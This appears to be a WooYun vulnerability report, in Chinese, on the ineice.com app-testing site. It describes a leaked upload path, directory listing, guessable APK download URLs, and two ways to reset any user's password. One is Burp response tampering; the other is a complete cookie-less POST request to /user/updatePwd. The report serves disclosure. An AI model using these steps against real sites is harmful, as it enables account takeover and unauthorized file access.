WooYun.org

爱内测：http://www.ineice.com/
1、绝对路径泄露
上传app后，会返回上传后apk存储的绝对路径，并且会返回一个子域名回来，这个子域名存在目录遍历漏洞：

2、目录遍历：http://fs.ineice.com/detect/icon/

这又牵扯出另一个问题，通过组合访问返回绝对路径信息，可直接下载apk：

这个apk后面的目录名可通过第2点中的目录遍历漏洞获取到，文件名是时间戳+3位随机数，时间戳可通过目录遍历获取到的目录名前面的时间获取到（好像有个时间差，在20秒左右），3位随机数就爆破都可以了，所以要想下载的话，还是很简单的，只不过...然并卵
3、任意用户密码重置 --- 方法1
在页面修改密码的地方：

当前密码任意填，然后输入新密码，在提交的时候使用burpsuite拦截请求，并且中断应答，然后将第一次应答回来的result值改为1（当前密码校验错误返回的是0），拦截请求，将要修改密码的用户改为要修改的用户名，过程如图：

4、任意用户密码重置 --- 方法2
其实还可以更简单点，直接发送请求：

POST /user/updatePwd HTTP/1.1
Host: www.ineice.com
Connection: keep-alive
Content-Length: 37
Accept: */*
Origin: http://www.ineice.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.ineice.com/user/changePwd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
email=[账号]&pwd=[新密码]

连cookie都不用，就重置成功了